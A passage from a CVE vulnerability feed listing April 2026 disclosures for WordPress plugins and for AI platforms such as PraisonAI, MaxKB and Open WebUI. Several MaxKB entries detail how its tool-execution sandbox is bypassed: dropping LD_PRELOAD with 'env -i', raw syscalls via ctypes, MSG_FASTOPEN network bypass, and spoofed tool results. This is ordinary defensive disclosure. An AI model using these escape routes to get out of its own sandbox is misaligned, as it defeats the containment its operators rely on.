including, 3.20.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00086,"ranking_epss":0.2477,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L214","https://plugins.trac.wordpress.org/browser/woocommerce-germanized/tags/3.20.5/includes/gateways/direct-debit/class-wc-gzd-gateway-direct-debit.php#L982","https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6837ad-576f-4c25-9540-6144ddc8630e?source=cve"],"published_time":"2026-04-14T07:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-3017","summary":"The Smart Post Show – Post Grid, Post Carousel & Slider, and List Category Posts plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.0.12 via deserialization of untrusted input in the import_shortcodes() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.1158,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/changeset/3490703/post-carousel","https://www.wordfence.com/threat-intel/vulnerabilities/id/45690747-0b8d-4e2e-8dd0-07c12791c064?source=cve"],"published_time":"2026-04-14T06:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4059","summary":"The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the woolentor_quickview_button shortcode's button_text attribute in all versions up to, and including, 3.3.5. This is due to insufficient input sanitization and missing output escaping on user-supplied shortcode attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10551,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.4/includes/modules/quickview/includes/classes/Frontend/Shortcode.php#L61","https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.4/includes/modules/quickview/includes/templates/quickview-button.php#L1","https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/includes/modules/quickview/includes/classes/Frontend/Shortcode.php#L61","https://plugins.trac.wordpress.org/changeset/3493664/woolentor-addons/trunk/includes/modules/quickview/includes/classes/Frontend/Shortcode.php","https://plugins.trac.wordpress.org/changeset?old_path=%2Fwoolentor-addons/tags/3.3.5&new_path=%2Fwoolentor-addons/tags/3.3.6","https://ti.wordfence.io/vendors/patch/1796/download","https://www.wordfence.com/threat-intel/vulnerabilities/id/fdf0b13e-154c-4007-bfc2-5346d906f7ca?source=cve"],"published_time":"2026-04-14T04:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4479","summary":"The WholeSale Products Dynamic Pricing Management WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","cvss":4.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.4,"cvss_v4":null,"epss":0.00022,"ranking_epss":0.05809,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/wholesale-products-dynamic-pricing-management-woocommerce/trunk/class-main.php#L114","https://www.wordfence.com/threat-intel/vulnerabilities/id/6b0382e2-e029-4e19-981c-6dc570e182f0?source=cve"],"published_time":"2026-04-14T04:17:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40315","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.133, there is an SQL identifier injection vulnerability in SQLiteConversationStore where the table_prefix configuration value is directly concatenated into SQL queries via f-strings without any validation or sanitization. Since SQL identifiers cannot be safely parameterized, an attacker who controls the table_prefix value (e.g., through from_yaml or from_dict configuration input) can inject arbitrary SQL fragments that alter query structure. This enables unauthorized data access, such as reading internal SQLite tables like sqlite_master, and manipulation of query results through techniques like UNION-based injection. The vulnerability propagates from configuration input in config.py, through factory.py, to the SQL query construction in sqlite.py. Exploitation requires the ability to influence configuration input, and successful exploitation leads to internal schema disclosure and full query result tampering. This issue has been fixed in version 4.5.133.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.2,"epss":0.00022,"ranking_epss":0.05886,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/commit/0accebb2e3c3ec2fca66bbea0444fb7a35f0b4ef","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x783-xp3g-mqhp"],"published_time":"2026-04-14T04:17:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40313","summary":"PraisonAI is a multi-agent teams system. In versions 4.5.139 and below, the GitHub Actions workflows are vulnerable to ArtiPACKED attack, a known credential leakage vector caused by using actions/checkout without setting persist-credentials: false. By default, actions/checkout writes the GITHUB_TOKEN (and sometimes ACTIONS_RUNTIME_TOKEN) into the .git/config file for persistence, and if any subsequent workflow step uploads artifacts (build outputs, logs, test results, etc.), these tokens can be inadvertently included. Since PraisonAI is a public repository, any user with read access can download these artifacts and extract the leaked tokens, potentially enabling an attacker to push malicious code, poison releases and PyPI/Docker packages, steal repository secrets, and execute a full supply chain compromise affecting all downstream users. The issue spans numerous workflow and action files across .github/workflows/ and .github/actions/. This issue has been fixed in version 4.5.140.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3959-6v5q-45q2","https://thehackernews.com/2024/08/github-vulnerability-artipacked-exposes.html","https://unit42.paloaltonetworks.com/github-repo-artifacts-leak-tokens"],"published_time":"2026-04-14T04:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40288","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the workflow engine is vulnerable to arbitrary command and code execution through untrusted YAML files. When praisonai workflow run <file.yaml> loads a YAML file with type: job, the JobWorkflowExecutor in job_workflow.py processes steps that support run: (shell commands via subprocess.run()), script: (inline Python via exec()), and python: (arbitrary Python script execution)—all without any validation, sandboxing, or user confirmation. The affected code paths include action_run() in workflow.py and _exec_shell(), _exec_inline_python(), and _exec_python_script() in job_workflow.py. An attacker who can supply or influence a workflow YAML file (particularly in CI pipelines, shared repositories, or multi-tenant deployment environments) can achieve full arbitrary command execution on the host system, compromising the machine and any accessible data or credentials. This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00066,"ranking_epss":0.20268,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-vc46-vw85-3wvm"],"published_time":"2026-04-14T04:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40289","summary":"PraisonAI is a multi-agent teams system. In versions below 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents, the browser bridge (praisonai browser start) is vulnerable to unauthenticated remote session hijacking due to missing authentication and a bypassable origin check on its /ws WebSocket endpoint. The server binds to 0.0.0.0 by default and only validates the Origin header when one is present, meaning any non-browser client that omits the header is accepted without restriction. An unauthenticated network attacker can connect, send a start_session message, and the server will route it to the first idle browser-extension WebSocket (effectively hijacking that session) and then broadcast all resulting automation actions and outputs back to the attacker. This enables unauthorized remote control of connected browser automation sessions, leakage of sensitive page context and automation results, and misuse of model-backed browser actions in any environment where the bridge is network-reachable. This issue has been fixed in versions 4.5.139 of PraisonAI and 1.5.140 of praisonaiagents.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00055,"ranking_epss":0.17268,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-8x8f-54wf-vv92"],"published_time":"2026-04-14T04:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40287","summary":"PraisonAI is a multi-agent teams system. Versions 4.5.138 and below are vulnerable to arbitrary code execution through automatic, unsanitized import of a tools.py file from the current working directory. Components including call.py (import_tools_from_file()), tool_resolver.py (_load_local_tools()), and CLI tool-loading paths blindly import ./tools.py at startup without any validation, sandboxing, or user confirmation. An attacker who can place a malicious tools.py in the directory where PraisonAI is launched (such as through a shared project, cloned repository, or writable workspace) achieves immediate arbitrary Python code execution in the host environment. This compromises the full PraisonAI process, the host system, and any connected data or credentials. This issue has been fixed in version 4.5.139.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06212,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-g985-wjh9-qxxc"],"published_time":"2026-04-14T04:17:11","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1607","summary":"The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","cvss":6.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.4,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/surbma-bookingcom-shortcode/tags/2.0/surbma-bookingcom-shortcode.php#L34","https://www.wordfence.com/threat-intel/vulnerabilities/id/01280afb-4745-4f36-823e-ed794bb3353a?source=cve"],"published_time":"2026-04-14T04:17:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6264","summary":"A critical vulnerability in the Talend JobServer and Talend Runtime allows unauthenticated remote code execution via the JMX monitoring port. The attack vector is the JMX monitoring port of the Talend JobServer. The vulnerability can be mitigated for the Talend JobServer by requiring TLS client authentication for the monitoring port; however, the patch must be applied for full mitigation. For Talend ESB Runtime, the vulnerability can be mitigated by disabling the JobServer JMX monitoring port, which is disabled by default from the R2024-07-RT patch.","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00237,"ranking_epss":0.46766,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fix-for-the-Qlik-Talend-JobServer-and-Talend/tac-p/2541974"],"published_time":"2026-04-14T03:16:09","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34984","summary":"External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Versions 2.2.0 and below contain a vulnerability in runtime/template/v2/template.go where the v2 template engine removes env and expandenv from Sprig's TxtFuncMap() but leaves the getHostByName function accessible to user-controlled templates. Since ESO executes templates within the controller process, an attacker who can create or update templated ExternalSecret resources can invoke controller-side DNS lookups using secret-derived values. This creates a DNS exfiltration primitive, allowing fetched secret material to be leaked via DNS queries without requiring direct outbound network access from the attacker's workload. The impact is a confidentiality issue, particularly in environments where untrusted or lower-trust users can author templated ExternalSecret resources and the controller has DNS resolution capability. This issue has been fixed in version 2.3.0.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.0004,"ranking_epss":0.11863,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/external-secrets/external-secrets/commit/6800989bdc12782ca2605d3b8bf7f2876a16551a","https://github.com/external-secrets/external-secrets/releases/tag/v2.3.0","https://github.com/external-secrets/external-secrets/security/advisories/GHSA-r2pg-r6h7-crf3"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4388","summary":"The Form Maker by 10Web plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Matrix field (Text Box input type) in form submissions in all versions up to, and including, 1.15.40. This is due to insufficient input sanitization (`sanitize_text_field` strips tags but not quotes) and missing output escaping when rendering submission data in the admin Submissions view. This makes it possible for unauthenticated attackers to inject arbitrary JavaScript through a form submission that executes in the browser of an administrator who views the submission details.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.0007,"ranking_epss":0.21347,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L166","https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/admin/views/FormMakerSubmits.php#L169","https://plugins.trac.wordpress.org/browser/form-maker/tags/1.15.37/frontend/models/form_maker.php#L2352","https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3501693%40form-maker%2Ftrunk&old=3492680%40form-maker%2Ftrunk&sfp_email=&sfph_mail=","https://www.wordfence.com/threat-intel/vulnerabilities/id/197449f5-9304-49df-9261-a354145fc00e?source=cve"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6227","summary":"The BackWPup plugin for WordPress is vulnerable to Local File Inclusion via the `block_name` parameter of the `/wp-json/backwpup/v1/getblock` REST endpoint in all versions up to, and including, 5.6.6 due to a non-recursive `str_replace()` sanitization of path traversal sequences. This makes it possible for authenticated attackers, with Administrator-level access and above, to include arbitrary PHP files on the server via crafted traversal sequences (e.g., `....//`), which can be leveraged to read sensitive files such as `wp-config.php` or achieve remote code execution in certain configurations. Administrators have the ability to grant individual users permission to handle backups, which may then allow lower-level users to exploit this vulnerability.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":0.00312,"ranking_epss":0.54398,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/inc/Utils/BackWPupHelpers.php#L23","https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/inc/Utils/BackWPupHelpers.php#L40","https://plugins.trac.wordpress.org/browser/backwpup/tags/5.6.5/src/Frontend/API/Rest.php#L52","https://plugins.trac.wordpress.org/browser/backwpup/trunk/inc/Utils/BackWPupHelpers.php#L23","https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3490642%40backwpup%2Ftrunk&old=3475739%40backwpup%2Ftrunk&sfp_email=&sfph_mail=#file26","https://www.wordfence.com/threat-intel/vulnerabilities/id/084e3f78-275b-4692-9cce-e17074f55cfb?source=cve"],"published_time":"2026-04-14T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39419","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an authenticated user can bypass sandbox result validation and spoof tool execution results by exploiting Python frame introspection to read the wrapper's UUID from its bytecode constants, then writing a forged result directly to file descriptor 1 (bypassing stdout redirection). By calling sys.exit(0), the attacker terminates the wrapper before it prints the legitimate output, causing the MaxKB service to parse and trust the spoofed response as the genuine tool result. This issue has been fixed in version 2.8.0.","cvss":3.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.1,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14278,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/38c4cfecd065293ede0437f6fa76cf0116591d25","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-f3c8-p474-xwfv"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39425","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability that allows authenticated users to inject arbitrary HTML and JavaScript into the Application prologue (Opening Remarks) field by wrapping malicious payloads in <html_rander> tags. The backend fails to sanitize or encode HTML entities in the prologue field when applications are created or updated via the /admin/api/workspace/{workspace_id}/application endpoint, storing the raw payload directly in the database. The frontend then renders this content using an innerHTML-equivalent mechanism, trusting <html_rander>-wrapped content to be safe, which enables persistent DOM-based Stored XSS execution against any visitor who opens the affected chatbot interface. Exploitation can lead to session hijacking, unauthorized actions performed on behalf of victims (such as deleting workspaces or applications), and sensitive data exposure. This issue has been fixed in version 2.8.0.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00069,"ranking_epss":0.21245,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-3rq5-pgm7-pvp4"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39426","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability where the frontend's MdRenderer.vue component parses custom <iframe_render> tags from LLM responses or Application Prologue configurations, bypassing standard Markdown sanitization and XSS filtering. The unsanitized HTML content is passed to the IframeRender.vue component, which renders it directly into an <iframe> via the srcdoc attribute configured with sandbox=\"allow-scripts allow-same-origin\". This can be a dangerous combination, allowing injected scripts to escape the iframe and execute JavaScript in the parent window using window.parent. Since the Prologue is rendered for any user visiting an application's chat interface, this results in a high-impact Stored XSS that can lead to session hijacking, unauthorized actions, and sensitive data exposure. This issue has been fixed in version 2.8.0.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":0.00047,"ranking_epss":0.14223,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-q2qg-43vq-f2wv"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4352","summary":"The JetEngine plugin for WordPress is vulnerable to SQL Injection via the Custom Content Type (CCT) REST API search endpoint in all versions up to, and including, 3.8.6.1. This is due to the `_cct_search` parameter being interpolated directly into a SQL query string via `sprintf()` without sanitization or use of `$wpdb->prepare()`. WordPress REST API's `wp_unslash()` call on `$_GET` strips the `wp_magic_quotes()` protection, allowing single-quote-based injection. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The Custom Content Types module must be enabled with at least one CCT configured with a public REST GET endpoint for exploitation.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00064,"ranking_epss":0.1989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://crocoblock.com/plugins/jetengine/","https://www.wordfence.com/threat-intel/vulnerabilities/id/29a5701f-92f7-4a02-a990-b189a381cff5?source=cve"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4365","summary":"The LearnPress plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the `delete_question_answer()` function in all versions up to, and including, 4.3.2.8. The plugin exposes a `wp_rest` nonce in public frontend HTML (`lpData`) to unauthenticated visitors, and uses that nonce as the only security gate for the `lp-load-ajax` AJAX dispatcher. The `delete_question_answer` action has no capability or ownership check. This makes it possible for unauthenticated attackers to delete any quiz answer option by sending a crafted POST request with a publicly available nonce.","cvss":9.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.1,"cvss_v4":null,"epss":0.00054,"ranking_epss":0.167,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/Ajax/AbstractAjax.php#L33","https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/Ajax/EditQuestionAjax.php#L285","https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/class-lp-assets.php#L177","https://www.wordfence.com/threat-intel/vulnerabilities/id/021bd566-1663-46ba-a616-ab554b691cbb?source=cve"],"published_time":"2026-04-14T02:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34225","summary":"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.7.2 and below contain a Blind Server Side Request Forgery in the functionality that allows editing an image via a prompt. The affected function performs a GET request to a user-provided URL with no restriction on the domain, allowing the local address space to be accessed. Since the SSRF is blind (the response cannot be read), the primary impact is port scanning of the local network, as whether a port is open can be determined based on whether the GET request succeeds or fails. These response differentials can be automated to iterate through the entire port range and identify open ports. If the service running on an open port can be inferred, an attacker may be able to interact with it in a meaningful way, provided the service offers state-changing GET request endpoints. This issue was unresolved at the time of publication.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jgx9-jr5x-mvpv","https://github.com/open-webui/open-webui/security/advisories/GHSA-jgx9-jr5x-mvpv"],"published_time":"2026-04-14T02:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39423","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an Eval Injection vulnerability in the Markdown rendering engine that allows any user capable of interacting with the AI chat interface to execute arbitrary JavaScript in the browsers of other users, including administrators, resulting in Stored Cross-Site Scripting (XSS). This issue has been fixed in version 2.8.0.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13361,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/34fb95bde9574c5b3a734ab00c7f29b9e7d32669","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-462x-99gf-mp79"],"published_time":"2026-04-14T01:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39424","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, the chat export feature is vulnerable to Improper Neutralization of Formula Elements in a CSV File. When an administrator exports the application chat history to an Excel file (.xlsx) via the /admin/api/workspace/{workspace_id}/application/{application_id}/chat/export endpoint, strings starting with formula characters are written directly without proper sanitization. Opening this file in spreadsheet applications like Microsoft Excel can lead to Arbitrary Code Execution (RCE) on the administrator's workstation via Dynamic Data Exchange (DDE). The issue is a variant of CVE-2025-4546, which fixed the exact same pattern in apps/dataset/serializers/document_serializers.py but missed the application chat export sink. This issue has been fixed in version 2.8.0.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.3,"epss":0.00061,"ranking_epss":0.18876,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/24cd68acae5f726eed828e2ac801827a2a70536f","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-rr4r-7cj2-29vp"],"published_time":"2026-04-14T01:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34262","summary":"Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3730639","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34264","summary":"During authorization checks in SAP Human Capital Management for SAP S/4HANA, the system returns specific messages. Due to this, an authenticated user with low privileges could guess and enumerate the content shown, beyond their authorized scope. This leads to disclosure of sensitive information causing a high impact on confidentiality, while integrity and availability are unaffected.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08605,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3680767","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39418","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, sandbox network protection can be bypassed by using socket.sendto() with the MSG_FASTOPEN flag. This allows authenticated user with tool-editing permissions to reach internal services that are explicitly blocked by the sandbox's banned hosts configuration. MaxKB's sandbox uses LD_PRELOAD to hook the connect() function and block connections to banned IPs, but Linux's sendto() with the MSG_FASTOPEN flag can establish TCP connections directly through the kernel without ever calling connect(), completely bypassing the IP validation. Although sendto is listed in the syscall() wrapper, this is ineffective because glibc invokes the kernel syscall directly rather than routing through the hooked syscall() function. This issue has been fixed in version 2.8.0.","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07651,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/4d06362750b15390437f1d2e4d14ec79baef8559","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-w9g4-q3gm-6q6w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39420","summary":"MaxKB is an open-source AI assistant for enterprise. In versions 2.7.1 and below, an incomplete sandbox protection mechanism allows an authenticated user with tool execution privileges to escape the LD_PRELOAD-based sandbox. By env command the attacker can clear the environment variables and drop the sandbox.so hook, leading to unrestricted Remote Code Execution (RCE) and network access. MaxKB restricts untrusted Python code execution via the Tool Debug API by injecting sandbox.so through the LD_PRELOAD environment variable. This intercepts sensitive C library functions (like execve, socket, open) to restrict network and file access. However, a patch allowed the /usr/bin/env utility to be executed by the sandboxed user. When an attacker is permitted to create subprocesses, they can execute the env -i python command. The -i flag instructs env to completely clear all environment variables before running the target program. This effectively drops the LD_PRELOAD environment variable. The newly spawned Python process will therefore execute natively without any sandbox hooks, bypassing all network and file system restrictions. This issue has been fixed in version 2.8.0.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":0.00153,"ranking_epss":0.3598,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/2d17b08e6b060329803754a05e806d0ddecf3fa8","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-7wgv-v2r3-7f7w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39421","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":0.00074,"ranking_epss":0.22304,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39422","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability through the application name or icon fields when creating an application. When a victim visits the public chat interface (/ui/chat/{access_token}), the ChatHeadersMiddleware retrieves the application data and directly inserts the unescaped application name and icon into the HTML response via string replacement. This allows an attacker to execute arbitrary JavaScript in the victim's browser context. This issue has been fixed in version 